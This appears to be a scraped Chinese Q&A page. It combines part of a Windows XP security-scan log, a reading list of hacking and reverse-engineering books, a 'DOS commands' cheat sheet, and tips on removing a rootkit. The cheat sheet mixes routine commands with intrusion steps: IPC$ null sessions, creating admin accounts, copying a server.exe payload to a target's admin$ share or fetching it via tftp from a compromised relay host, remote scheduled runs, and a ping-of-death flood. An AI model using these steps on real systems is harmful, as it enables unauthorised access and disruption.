[KNetWch / KNetWch][Stopped/System Start]
<\??\f:\KAV2007\KNetWch.SYS><N/A>
[KWatch3 / KWatch3][Running/System Start]
<\??\C:\WINDOWS\system32\drivers\KWatch3.SYS><Kingsoft Corporation>
[MegaIDE / MegaIDE][Running/Boot Start]
<\SystemRoot\System32\DRIVERS\MegaIDE.sys><LSI Logic Corporation.>
[npkcrypt / npkcrypt][Running/Auto Start]
<\??\f:\Tencent\QQ\npkcrypt.sys><INCA Internet Co., Ltd.>
[nv / nv][Stopped/Manual Start]
<system32\DRIVERS\nv4_mini.sys><NVIDIA Corporation>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
<system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[Realtek RTL8139(A/B/C)-based PCI Fast Ethernet Adapter NT Driver / rtl8139][Stopped/Manual Start]
<system32\DRIVERS\RTL8139.SYS><Realtek Semiconctor Corporation>
[Secdrv / Secdrv][Running/Auto Start]
<system32\DRIVERS\secdrv.sys><Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.>
[Intel (R) System Management BIOS Service / SMBios][Running/Manual Start]
<system32\DRIVERS\SMBios.sys><Intel Corporation>
[smserial / smserial][Running/Manual Start]
<system32\DRIVERS\smserial.sys><Motorola Inc.>
[TSP / TSP][Stopped/Manual Start]
<\??\C:\WINDOWS\system32\drivers\klif.sys><Kaspersky Lab>
[ViaIde / ViaIde][Running/Boot Start]
<\SystemRoot\system32\DRIVERS\viaide.sys><Microsoft Corporation>
==================================
浏览器加载项
[Adobe PDF Reader Link Helper]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[QQBrowserHelperObject Class]
{54EBD53A-9BC1-480B-966A-843A333CA162} <f:\Tencent\QQ\QQIEHelper.dll, 深圳市腾讯计算机系统有限公司>
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C283} <f:\Thunder Network\Thunder\ComDlls\XunLeiBHO_002.dll, Thunder Networking Technologies,LTD>
[NavigatMon Class]
{B69F34DD-F0F9-42DC-9EDD-957187DA688D} <D:\360safe\safemon\safemon.dll, >
[浩方对战平台]
{0A155D3C-68E2-4215-A47A-E800A446447A} <F:\HFGameOPT\GameClient.exe, 上海浩方在线信息技术有限公司>
[Web反病毒保护]
{1F460357-8A94-4D71-9CA3-AA4ACF32ED8E} <F:\Kaspersky Lab\Kaspersky Anti-Virus 6.0\scieplugin.dll, Kaspersky Lab>
[信息检索(&R)]
{92780B25-18CC-41C8-B9BE-3C9C571A8263} <D:\MICROS~1\OFFICE11\REFIEBAR.DLL, Microsoft Corporation>
[QQIEFloatBarCfgCmd Class]
{DEDEB80D-FA35-45d9-9460-4983E5A8AFE6} <f:\Tencent\QQ\QQIEHelper.dll, 深圳市腾讯计算机系统有限公司>
[CEditCtrl Object]
{488A4255-3236-44B3-8F27-FA1AECAA8844} <C:\WINDOWS\system32\aliedit\AliEdit.dll, www.alipay.com>
[Shockwave Flash Object]
{D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx, Adobe Systems, Inc.>
[Adobe PDF Reader Link Helper]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[QQBrowserHelperObject Class]
{54EBD53A-9BC1-480B-966A-843A333CA162} <f:\Tencent\QQ\QQIEHelper.dll, 深圳市腾讯计算机系统有限公司>
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C283} <f:\Thunder Network\Thunder\ComDlls\XunLeiBHO_002.dll, Thunder Networking Technologies,LTD>
[NavigatMon Class]
{B69F34DD-F0F9-42DC-9EDD-957187DA688D} <D:\360safe\safemon\safemon.dll, >
[&使用迅雷下载]
<f:\Thunder Network\Thunder\Program\GetUrl.htm, N/A>
[&使用迅雷下载全部链接]
<f:\Thunder Network\Thunder\Program\GetAllUrl.htm, N/A>
[导出到 Microsoft Office Excel(&X)]
<res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>
==================================
正在运行的进程
[PID: 600][\SystemRoot\System32\smss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 664][\??\C:\WINDOWS\system32\csrss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 688][\??\C:\WINDOWS\system32\winlogon.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\system32\klogon.dll] [Kaspersky Lab, 6.0.0.299]
[PID: 732][C:\WINDOWS\system32\services.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 744][C:\WINDOWS\system32\lsass.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 896][C:\WINDOWS\system32\Ati2evxx.exe] [N/A, N/A]
[PID: 908][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1000][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1116][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1204][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1312][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1544][C:\WINDOWS\system32\spoolsv.exe] [Microsoft Corporation, 5.1.2600.2696 (xpsp_sp2_gdr.050610-1519)]
[C:\WINDOWS\system32\EBPMON2.DLL] [SEIKO EPSON CORPORATION, 2, 20, 0, 0]
[PID: 1664][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[C:\Program Files\Adobe\Acrobat 7.0\ActiveX\PDFShell.dll] [Adobe Systems, Inc., 7.0.0.0]
[f:\Thunder Network\Thunder\ComDlls\XunLeiBHO_002.dll] [Thunder Networking Technologies,LTD, 5, 0, 0, 2]
[C:\WINDOWS\system32\msdmo.dll] [N/A, N/A]
[C:\Program Files\WinRAR\rarext.dll] [N/A, N/A]
[F:\Kaspersky Lab\Kaspersky Anti-Virus 6.0\shellex.dll] [Kaspersky Lab, 6.0.0.299]
[f:\Unlocker\UnlockerHook.dll] [N/A, N/A]
[C:\WINDOWS\system32\icm32.dll] [Microsoft Corporation, 5.1.2600.2709 (xpsp_sp2_gdr.050628-1518)]
[f:\Unlocker\UnlockerCOM.dll] [N/A, N/A]
[C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll] [Adobe Systems Incorporated, 7.0.7.2006011200]
[PID: 1860][C:\WINDOWS\SOUNDMAN.EXE] [Realtek Semiconctor Corp., 5.1.0.22]
[PID: 1868][C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe] [ATI Technologies, Inc., 6.14.10.5120]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[C:\Program Files\ATI Technologies\ATI Control Panel\atipdsxx.dll] [ATI Technologies, Inc., 6.14.10.5120]
[C:\PROGRAM FILES\ATI TECHNOLOGIES\ATI CONTROL PANEL\ATRPUIXX.CHS] [ATI Technologies, Inc., 6.14.10.5120]
[C:\Program Files\ATI Technologies\ATI Control Panel\atipdxxx.dll] [ATI Technologies, Inc., 6.14.10.5120]
[PID: 1876][C:\WINDOWS\sm56hlpr.exe] [Motorola Inc., 6.09.07]
[C:\WINDOWS\sm56eng.dll] [N/A, N/A]
[C:\WINDOWS\sm56fra.dll] [N/A, N/A]
[C:\WINDOWS\sm56brz.dll] [N/A, N/A]
[C:\WINDOWS\sm56chs.dll] [N/A, N/A]
[C:\WINDOWS\sm56cht.dll] [N/A, N/A]
[C:\WINDOWS\sm56ger.dll] [N/A, N/A]
[C:\WINDOWS\sm56itl.dll] [N/A, N/A]
[C:\WINDOWS\sm56jpn.dll] [N/A, N/A]
[C:\WINDOWS\sm56spn.dll] [N/A, N/A]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[PID: 1884][C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE] [SEIKO EPSON CORPORATION, 3.03]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[PID: 1912][D:\360safe\safemon\360tray.exe] [奇虎网, 1, 0, 1, 1004]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[D:\360safe\safemon\SafeKrnl.dll] [奇虎网, 1, 0, 0, 3001]
[D:\360safe\AntiAdwa.dll] [360Safe.com, 2, 2, 5, 1000]
[D:\360safe\live.dll] [360safe.COM, 1, 0, 0, 1011]
[f:\Unlocker\UnlockerHook.dll] [N/A, N/A]
[PID: 1944][C:\Program Files\Common Files\Real\Update_OB\realsched.exe] [RealNetworks, Inc., 0.1.0.3760]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[PID: 2008][C:\WINDOWS\system32\ctfmon.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[PID: 212][C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe] [SEIKO EPSON CORPORATION, 2, 2, 0, 0]
[C:\WINDOWS\system32\EBAPI2.DLL] [SEIKO EPSON CORPORATION, 1, 4, 0, 0]
[C:\Program Files\Common Files\EPSON\EBAPI\EBPLPT.DLL] [SEIKO EPSON CORPORATION, 2, 20, 0, 0]
[PID: 168][C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE] [Microsoft Corporation, 7.00.9466]
[PID: 476][C:\Program Files\Common Files\Sogou PXP\p2psvr.exe] [Sohu.com Inc., 2, 0, 0, 28]
[C:\Program Files\Sogou PXP\vodsvr.dll] [Sohu.com Inc., 2, 3, 0, 1]
[C:\Program Files\Sogou PXP\pxpnet.dll] [Sohu.com Inc., 1, 0, 0, 9]
[C:\Program Files\Sogou PXP\p2pclient.dll] [Sohu.com Inc., 2, 9, 1, 4]
[PID: 1724][C:\WINDOWS\System32\alg.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
==================================
文件关联
.TXT OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.EXE OK. ["%1" %*]
.COM OK. ["%1" %*]
.PIF OK. ["%1" %*]
.REG OK. [regedit.exe "%1"]
.BAT OK. ["%1" %*]
.SCR OK. ["%1" /S]
.CHM OK. ["C:\WINDOWS\hh.exe" %1]
.HLP OK. [%SystemRoot%\System32\winhlp32.exe %1]
.INI OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.INF OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.JS OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK OK. [{00021401-0000-0000-C000-000000000046}]
==================================
Winsock 提供者
N/A
==================================
Autorun.inf
N/A
==================================
HOSTS 文件
127.0.0.1 localhost
==================================
API HOOK
警告!System Repair Engineer 提醒
你下面的函数内容与预期值不符,他
们可能被一些恶意的软件所修改:
RVA 错误: LoadLibraryA
RVA 错误: LoadLibraryExA
RVA 错误: LoadLibraryExW
RVA 错误: LoadLibraryW
入口点错误:CreateProcessA
入口点错误:CreateProcessW
==================================
[/CODE]
9. 我想自学计算机请问我要要买那些最基础的资料书啊
1.《黑客入门》
这是我看的第一本黑客书籍,是比较初级的一些黑客知识,但是后面的实例运用到了html代码,主要是讲
网页方面入侵知识,当时我自己也看不懂那些,因此就去把html学一下(其实也就是看看代码而已,自己
根本写不出啥代码来,呵呵……)
2.《30天打造专业红客》
任何一本写着什么几天精通,几天速成的书,其实都是不可信的,但这不是我们现在要讲的问题,这本书
可以弥补上本书中的本足之处,里面有一些内容可能讲得会比较详细些,适合初学者。
3.《防黑档案》
这本书是东方飘云写的,好像就是绿色兵团的副司令吧,呵呵,我先顶一下…………
4.《黑客攻防实战入门》
这是一本以实战为主线的黑客书籍,大力推荐!!!必竟电脑技术本来就是要在实践中才能提高的,光靠
理论是行不通,你可以边看此书边操作,相信对于你的实战能力会有所帮助的。
上面这些都是一些黑客入门方面的书籍,其中有部分是相同,大家可择其善者而从之!!!
5.《C语言程序设计》
不学编程的人是永远不可能成为黑客的,因此学编程也成为我们在学黑道路上的必经之路,也是最需要精
力与耐力的过程。这本就是谭浩强写的那本,大家也可以看看老外写的那本《the c programe language》,
如果你能将书中的代码都自己调试操作一遍,对于C语言基础知识的掌握应该不成问题。
6.《VC++深入详解》
这是一本他人根据孙鑫的视频教程编写的一本书,因此这本书也就有其配套视频了,地址如下:
http://tech.163.com/special/0009159F/vc.html
7.《IBM-PC汇编语言程序设计》
这是清华大学出版的,虽然有点过时了,是本16位机器时代的,与现在的win32,win64有点差别,但其本
质也是大同小异的,相信对于想学习逆向分析的战友们,汇编也是一项必修课啊,关于此书,各位可以看
看中山大学的汇编语言视频教程,其教学方式也是比较新颖的,大家一看便知,地址如下:
http://bbs.topsage.com/dispbbs_121_164375_1.html
如果想要看在线视频,可通过下面地址查看:http://202.116.65.193/Ncourse/hbyy/hb01/,
将后面的hb01改为02,03……即可,不过很慢,缓冲都要N久,我是等得不耐烦了,呵呵
8.《windows环境下的32位汇编语言程序设计》
就是罗云彬写的那本,如果你学完了上本汇编书籍或视频,那么就可以开始学习win32汇编了,要知道这本
书我是用手机看的,呵呵,不容易啊,因为缺乏实践,因此自己学得也不咋滴,自己是打算先简单看一遍
,简单了解个大概,再看第二遍,这遍以实践操作为主,最后再系统地复习一遍,这项任务,本人尚未完
成啊,以上意见也只是给大家做个参考而已,希望对大家有所帮助。
9.《ASP从入门到精通》
想学脚本入侵的战友,脚本语言是一定要学的,有机会也最好自己做个博客之类的站点。这本书后面有很
多的实例项目,如后台管理,收费系统等等。另外还有一本我自己看过的关于asp的书——《ASP可视化编
程与应用》,此书是在dreamweaver下面的实践操作,也算是在学asp的同时,也学习一下dreamweaver的
使用,一举两得。这两本书中对html以及vbscript均有所讲解,因为asp中可嵌入vbscript,javascript.
10.《php高手宝典》
此书我是没看过,只是看了下目录与开头而已,打算后面有时间再补看一下,因此对此书我也没有什么发
言权了,有看过的战友可以发表一下意见。
11.《黑客反汇编揭秘》
这是一本关于逆向分析的书,与其配套的还有一本叫《黑客调试技术揭秘》,反汇编这本书网上有电子书
,大家可下载来看,pdf格式的,但是调试这本书我没找到,在网上写着调试的书名,下载下来才发现是反
汇编那本书.这两本书对汇编知识均有一定的要求,因此建议大家先学完汇编再看。
12.《网络黑客加密与解密》
这本书里面有一些脚本入侵方面的一点知识,内容较少,主要是讲加解密方面的知识,后面有大部分的破
解实例讲解,但注释较少,我自己当时也是看得迷糊迷糊的(没办法,自己汇编能力差点,呵呵)
13.《加密解密全方位学习》
这本书我是在图书馆看到的,适合加解密初学者,因为这本书要求的预备知识不高,只要有点C语言基础就
可以,里面会讲到一些相对简单些的汇编指令,以及crackme的简单制作,还有注册机的编写(个人觉得不
是很详细)
14.《加密与解密》
就是看雪学院那本书,第三版快出来了,就在这一二月份吧!我 看的是第二版的电子书,还没看完,这本
书在加解密方面写得算是比较完整详细的了,而且是从基础讲起,循序渐进,大力推荐,若要学习逆向工
程,看雪学院也确实是个不错的地方。
15.《shellcode编程揭秘》
这是一本关于缓冲区溢出攻击的书,我自己也没看过,不过电子书倒是有,就放在邮箱里面,呵呵,打算
后面再看,关于溢出攻击的书还有很多,如《网络渗透技术》,《缓冲区溢出攻击检测,预防,剖析》,
《the shellcode handbook》
16.《深入理解计算机系统》
此书也是我在图书馆借的,被我霸占了半年之久,这次又被我借回来复习一下了(真对不起各位书友啊,
呼呼……),这是一本站在程序员的角度写的一本书,因此也必须要有C语言基础,要是有unix系统的操作
经验会更好,因为这本书中的代码就是在UNIX下调试操作的。相信这本书对于你学出更好的代码会有一定
的帮助,其中还有特别的一章用来讲解如何编写高效的程序,并以一个实例代码来讲解,一步步地进行完
善,最终写出一个高效率的程序。这本书也是学溢出攻击方面的基础知识,在安全焦点上也说这本书是《
网络渗透技术》的基础知识,但看完这本书也不一定能看懂网渗,呵呵……
17.《rootkit:windows内核安全防护》
内容简介
本书是目前第一本关于rootkit的详尽指南,包括rootkit的概念、它们是怎样工作的、如何构建和检测它们
。世界顶级软件安全专家、rootkit.com创始人Greg Hoglund和James Butler向大家详细介绍攻击者是如何
进入系统并长期驻留而不会被检测到的,以及黑客是如何摧毁Windows XP和Windows 2000内核系统的,
其概念可以应用于现代任何主流操作系统。通过本书,读者可以全面掌握rootkit,提升自己的计算机安全
防范能力.
18.《0day安全:软件漏洞分析技术》
四月份刚出版的,看雪论坛的,有看过一部分学得还不错,适合对溢出感兴趣的战友们。要告诉你点常识…虽然多,但都是基本的!希望你可以用心去学!
DOS 命令
net use ipipc$ " " /user:" " 建立IPC空链接
net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: ipc$ 登陆后映射对方C:到本地为H:
net use ipipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意:
administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schele)
net stop 服务名 停止某服务
net time 目标ip 查看对方时间
net time 目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:"-w数字"用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:"-l[空格]数据包大小";"-n发送数据次数";"-t"指一直
ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参
数"/all"显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-
H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如"DEL/AR *.*"表示删除当前目录下所有只读文件,"DEL/A-
S *.*"表示删除当前目录下除系统文件以外的所有文件
二:
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统
确认就直接删除。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命
令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:
2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
ipadmin$svv.exe c: 或:ipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文
件)至本地C:
x 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将"IP"的
server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式
(传送文本文件模式)进行传送
tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文
本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway
addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 望采纳O(∩_∩)O
10. RootKit.Torn.aw
如果用瑞星杀不掉的话,用诺顿试试
实在不行的话,手动杀毒方法:
首先进入安全模式,关闭所有服务重起后,找到病毒主程序,在注册表查看中输入主程序文件名“比如1.exe”选上全匹配点确定,找到后删除,然后在删除病毒主程序“1.exe”
然后我的电脑——搜索——所有文件和文件夹里面输入“*.exe”后点搜索,就出现所有EXE文件,把自己认为所有有可能被感染的文件一个一个用记事本打开,具体方法是右键——打开方式——选记事本,就会出现该文件的代码,如果文件代码里面有“=病毒的代码"具体代码我在这里就不说了,可以在网上找到,没问题的文件当然就不用去管了,如果有这类代码的文件,那么是不重要的就删除,重要的就把代码删除后点保存就可以了,至于DLL文件都是和EXE文件有关联的,只要EXE文件被删除那么DLL文件只是死病毒没有任何作用,如果不放心的话也可以用同样的方法删除DLL文件搜索方法也是“*.DLL”。
好了以后把需要的服务打开后就可以了。补充下记得把网络断开后在实行操作。在完成后用杀毒软件杀一下,因为一般中大型病毒后会把一些比较老的小病毒带入所以杀下小病毒的话几乎任何杀毒软件都可以杀掉。